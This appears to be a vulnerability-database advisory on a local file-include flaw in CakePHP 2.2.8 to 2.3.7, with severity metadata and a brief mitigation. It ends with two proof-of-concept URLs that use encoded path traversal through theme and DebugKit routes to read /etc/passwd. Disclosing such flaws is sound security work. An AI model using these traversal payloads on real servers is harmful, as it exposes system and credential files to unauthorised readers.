CakePHP Local File-Include Vulnerability

vendor:

CakePHP

by:

SecurityFocus

7,5

CVSS

HIGH

Local File-Include

CWE

Product Name: CakePHP

Affected Version From: CakePHP 2.2.8

Affected Version To: CakePHP 2.3.7

Patch Exists: YES

Related CWE: N/A

CPE: a:cakephp:cakephp

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2013

CakePHP Local File-Include Vulnerability

CakePHP is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input. An attacker can exploit this vulnerability to view files or execute arbitrary script code in the context of the web server process. This may aid in further attacks.

Mitigation:

Input validation should be used to ensure that user-supplied data does not include malicious commands or scripts.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/61746/info

CakePHP is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.

An attacker can exploit this vulnerability to view files or execute arbitrary script code in the context of the web server process. This may aid in further attacks.

CakePHP 2.2.8 and 2.3.7 are vulnerable; other versions may also be affected. 

http://www.example.com/cakephp-2.3.7/theme/Test1/%2e.//%2e.//%2e.//%2e. //%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e./etc/passwd

http://www.example.com/cakephp-2.3.7/DebugKit/%2e.//%2e.//%2e.//%2e.// %2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e./etc/passwd